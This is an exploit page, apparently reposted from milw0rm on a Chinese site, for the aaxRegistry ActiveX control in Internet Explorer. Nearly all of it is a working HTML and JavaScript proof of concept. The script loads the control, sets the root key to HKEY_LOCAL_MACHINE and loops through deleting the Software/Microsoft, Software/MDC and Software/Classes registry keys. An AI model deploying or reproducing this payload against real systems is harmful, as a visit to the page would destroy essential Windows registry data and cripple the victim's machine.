|
aaxRegistry (aaxRegistry.ocx) Remote Registry Deletion Exploit
|
|
来源:h4ck-y0u.org 作者:t0pP8uZz 发布时间:2008-05-09
|
|
<HTML>
<!--
- aaxRegistry (aaxRegistry.ocx) Remote Registry Deletion Exploit -
Author: t0pP8uZz
Homepage: h4ck-y0u.org / milw0rm.com
Description: ActiveX Remote Insecure
Report: Tested on Microsoft Windows XP Pro (SP2 ) Internet Explorer 7 Fully Patched
ActiveX: http://www.aaxcomponents.com/aaxRegistry/aaxRegistryTRIALSetup.EXE
The Following Material Is For Educational Purposes Only - I will not be held responsable for any illegal actions.
InternetExplorer can Initialise this ActiveX control, And take advantage of its functions.
Included in this exploit (POC) is a peice of javascript code lauching the ActiveX control, and executing one of its functions.
Peace.
-->
<OBJECT ID="aaareg" CLASSID="CLSID:5A000763-F048-46C9-8976-A62226ECB31E">Could Not Load ActiveX Control.</OBJECT>
<script language="javascript">
/* - aaxRegistry (aaxRegistry.ocx) Remote Registry Deletion Exploit - */
/* Javascript Code By t0pP8uZz */
aaareg.SetRootKey("HKEY_LOCAL_MACHINE"); /* Play with keys in HKLM ;) */
var x = [ /* Add new keys below.. Script will loop though and delete*/
'Software/Microsoft',
'Software/MDC',
'Software/Classes'
];
for(var c=0; c<x.length; c++)
aaareg.DeleteKey(x[c]);
</script>
</HTML>
|
| |
|
[ 推荐]
[ 评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
| |
